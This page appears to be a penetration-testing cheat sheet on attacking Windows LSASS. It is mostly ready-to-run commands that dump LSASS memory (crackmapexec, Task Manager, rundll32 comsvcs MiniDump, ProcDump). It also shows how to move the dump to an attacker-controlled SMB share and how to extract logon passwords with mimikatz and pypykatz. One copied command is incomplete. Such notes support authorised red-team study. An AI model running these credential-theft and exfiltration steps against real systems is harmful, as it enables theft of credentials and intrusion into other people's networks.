Skip to content

Attacking LSASS

LSASS stores credentials that have active logon sessions on Windows systems. When we dumped LSASS process memory into the file, we essentially took a "snapshot" of what was in memory at that point in time.

Dumping LSASS remotely

crackmapexec smb $ip --local-auth -u <username> -p <password> --lsa

Dumping LSASS Locally

Task Manager Method

The Task Manager method is dependent on us having a GUI-based interactive session with a target.

Open Task Manager > Select the Processes tab > Find & right click the Local Security Authority Process > Select Create dump file

A file called lsass.DMP is created and saved in:

Attacking LSASS

C:\Users\loggedonusersdirectory\AppData\Local\Temp

This is the file we will transfer to our attack host. For instance, with smbserver.py from impacket.

1
2
3
4
5
6
7
# From the attacker machine (our kali) all we must do to create the share is run smbserver.py -smb2support using python, give the share a name (CompData) and specify the direct
#########################################
sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/ltnbob/Documents/

# From the victim's machine (windows)
#########################################
move C:\Users\loggedonusersdirectory\AppData\Local\Temp\lsass.DMP  \\$ipAttacker\CompData

Rundll32.exe & Comsvcs.dll Method

We can use an alternative method to dump LSASS process memory through a command-line utility called rundll32.exe.

Modern anti-virus tools recognize this method as malicious activity.

1
2
3
4
5
6
7
8
9
# Finding LSASS PID in cmd
tasklist /svc

# Finding LSASS PID in PowerShell
Get-Process lsass

# Creating lsass.dmp using an elevated PowerShell session
rundll32 C:\windows\system32\comsvcs.dll, MiniDump <PID> C:\lsass.dmp full
# With this command, we are running rundll32.exe to call an exported function of comsvcs.dll which also calls the MiniDumpWriteDump (MiniDump) function to dump the LSASS process memory to a specified directory (C:\lsass.dmp). 

Transfer file to attacking machine.

For instance, with smbserver.py from impacket.

# From the attacker machine (our kali) all we must do to create the share is run smbserver.py -smb2support using python, give the share a name (CompData) and specify the direct
#########################################
sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/ltnbob/Documents/

# From the victim's machine (windows)
#########################################
# If you are from powershell
cmd.exe /c move C:\lsass.dmp
# If you have a cmd terminal
move C:\lsass.dmp  \\$ipAttacker\CompData

ProcDump from Sysinternals

We can use ProcDump from the SysInternals suite to leverage this privilege and dump process memory.

Dumping the Local Security Authority Subsystem Service (LSASS) process:

procdump.exe -accepteula -ma lsass.exe lsass.dmp

Exploiting it from the target host (if we can load tools such as mimikatz):

mimikatz.exe

# Using 'mimikatz.log' for logfile : OK
mimikatz # log

# Switch to MINIDUMP : 'lsass.dmp'
mimikatz # sekurlsa::minidump lsass.dmp

# Opening : 'lsass.dmp' file for minidump...
mimikatz # sekurlsa::logonpasswords

Exploiting it without the capability of loading tools: take a manual memory dump of the LSASS process via the Task Manager by browsing to the Details tab, choosing the LSASS process, and selecting Create dump file.  Download this file back to our attack machine.

Crack the lsass file

Pypykatz

pypykatz parses the secrets hidden in the LSASS process memory dump.

pypykatz lsa minidump /home/path/lsass.dmp 

Mimikatz

After dumping the lsaas we have procude a file lsass.dmp. We can analyze it with mimikatz:

mimikatz.exe

# Using 'mimikatz.log' for logfile : OK
mimikatz # log

# Switch to MINIDUMP : 'lsass.dmp'
mimikatz # sekurlsa::minidump lsass.dmp

# Opening : 'lsass.dmp' file for minidump...
mimikatz # sekurlsa::logonpasswords
Last update: 2025-03-15
Created: July 15, 2023 17:03:48